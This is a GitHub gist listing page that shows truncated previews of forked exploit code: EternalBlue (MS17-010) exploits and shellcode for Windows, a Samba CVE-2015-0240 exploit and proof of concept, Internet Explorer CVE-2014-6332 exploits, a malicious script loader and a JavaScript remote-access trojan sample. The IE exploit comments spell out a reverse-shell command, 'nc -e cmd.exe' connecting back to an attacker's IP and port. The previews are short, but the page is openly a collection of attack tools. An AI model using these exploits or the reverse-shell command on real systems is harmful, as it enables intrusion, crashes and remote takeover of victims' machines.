@hackernix10
hackernix10 / eternalblue_merge_shellcode.py
Created March 20, 2019 15:06 — forked from worawit/eternalblue_merge_shellcode.py
Windows x64 and x86 kernel shellcode for eternalblue exploit
# This file has no update anymore. Please see https://github.com/worawit/MS17-010
import sys
from struct import pack
if len(sys.argv) < 4:
    print('Usage: {} sc_x86 sc_x64 sc_out'.format(sys.argv[0]))
    sys.exit()
sc_x86 = open(sys.argv[1], 'rb').read()
sc_x64 = open(sys.argv[2], 'rb').read()
@hackernix10
hackernix10 / eternalblue8_exploit.py
Created March 20, 2019 15:06 — forked from worawit/eternalblue8_exploit.py
Eternalblue exploit for Windows 8/2012
#!/usr/bin/python
# This file has no update anymore. Please see https://github.com/worawit/MS17-010
from impacket import smb, ntlm
from struct import pack
import sys
import socket
'''
EternalBlue exploit for Windows 8 and 2012 by sleepya
The exploit might FAIL and CRASH a target system (depending on what is overwritten)
@hackernix10
hackernix10 / eternalblue7_exploit.py
Created March 20, 2019 15:06 — forked from worawit/eternalblue7_exploit.py
Eternalblue exploit for Windows 7/2008
#!/usr/bin/python
# This file has no update anymore. Please see https://github.com/worawit/MS17-010
from impacket import smb
from struct import pack
import sys
import socket
'''
EternalBlue exploit for Windows 7/2008 by sleepya
The exploit might FAIL and CRASH a target system (depending on what is overwritten)
@hackernix10
hackernix10 / cve-2015-0240_samba_exploit.py
Created March 20, 2019 15:09 — forked from worawit/cve-2015-0240_samba_exploit.py
Exploit for Samba vulnerability (CVE-2015-0240)
#!/usr/bin/python
"""
Exploit for Samba vulnerability (CVE-2015-0240) by sleepya
The exploit only targets vulnerable x86 smbd <3.6.24, where 'creds' is controlled by the
ReferentID field of PrimaryName (ServerName). That means '_talloc_zero()'
in libtalloc does not write a value at the 'creds' address.
Reference:
- https://securityblog.redhat.com/2015/02/23/samba-vulnerability-cve-2015-0240/
@hackernix10
hackernix10 / cve-2015-0240_samba_poc
Created March 20, 2019 15:09 — forked from worawit/cve-2015-0240_samba_poc
PoC for Samba vulnerability (CVE-2015-0240)
#!/usr/bin/python
"""
PoC for Samba vulnerability (CVE-2015-0240) by sleepya
This PoC only triggers the bug
Reference:
- https://securityblog.redhat.com/2015/02/23/samba-vulnerability-cve-2015-0240/
#################
Exploitability against CentOS/Ubuntu binaries
@hackernix10
hackernix10 / cve-2014-6332_exploit.html
Created March 20, 2019 15:09 — forked from worawit/cve-2014-6332_exploit.html
CVE-2014-6332 IE exploit to get shell (packed everything in one html)
<html>
<head>
<!--
CVE-2014-6332 exploit to bypass IE protected mode if enabled (with localhost) then get shell
The exploit drops nc.exe then executes "nc -e cmd.exe -n ip port"
'server_ip' and 'server_port' in the javascript below determine the connect back target
Tested on
- IE11 + Windows 7 64-bit (EPM is off)
- IE11 + Windows 8.1 64-bit (EPM is off)
@hackernix10
hackernix10 / cve-2014-6332_win7_ie11_poc.html
Created March 20, 2019 15:09 — forked from worawit/cve-2014-6332_win7_ie11_poc.html
CVE-2014-6332 PoC to get shell or bypass protected mode
<html>
<head>
<!--
CVE-2014-6332 PoC to get meterpreter shell or bypass IE protected mode
- Tested on IE11 + Windows 7 64-bit
References:
- original PoC - http://www.exploit-db.com/exploits/35229/
- http://blog.trendmicro.com/trendlabs-security-intelligence/a-killer-combo-critical-vulnerability-and-godmode-exploitation-on-cve-2014-6332/
- http://security.coverity.com/blog/2014/Nov/eric-lippert-dissects-cve-2014-6332-a-19-year-old-microsoft-bug.html
@hackernix10
hackernix10 / firstpart.js
Created March 20, 2019 16:19 — forked from weltonrodrigo/firstpart.js
Code found on some google-analytics hijack
<script type="text/javascript">
function Carregar(url, callback)
{
var head = document.getElementsByTagName('head')[0];
var script = document.createElement('script');
script.type = 'text/javascript';
script.src = url;
script.onreadystatechange = callback;
script.onload = callback;
@hackernix10
hackernix10 / JavaScript RAT
Created March 26, 2019 04:57 — forked from JohnLaTwC/JavaScript RAT
JavaScript RAT
## uploaded by @JohnLaTwC
## sample hash: 1d37e2a657ccc595c7a5544df6fd2d35739455f3fdbc2d2700835873130befde
<html>
<head>
<script language="JScript">
window.resizeTo(1, 1);
window.moveTo(-2000, -2000);
window.blur();
try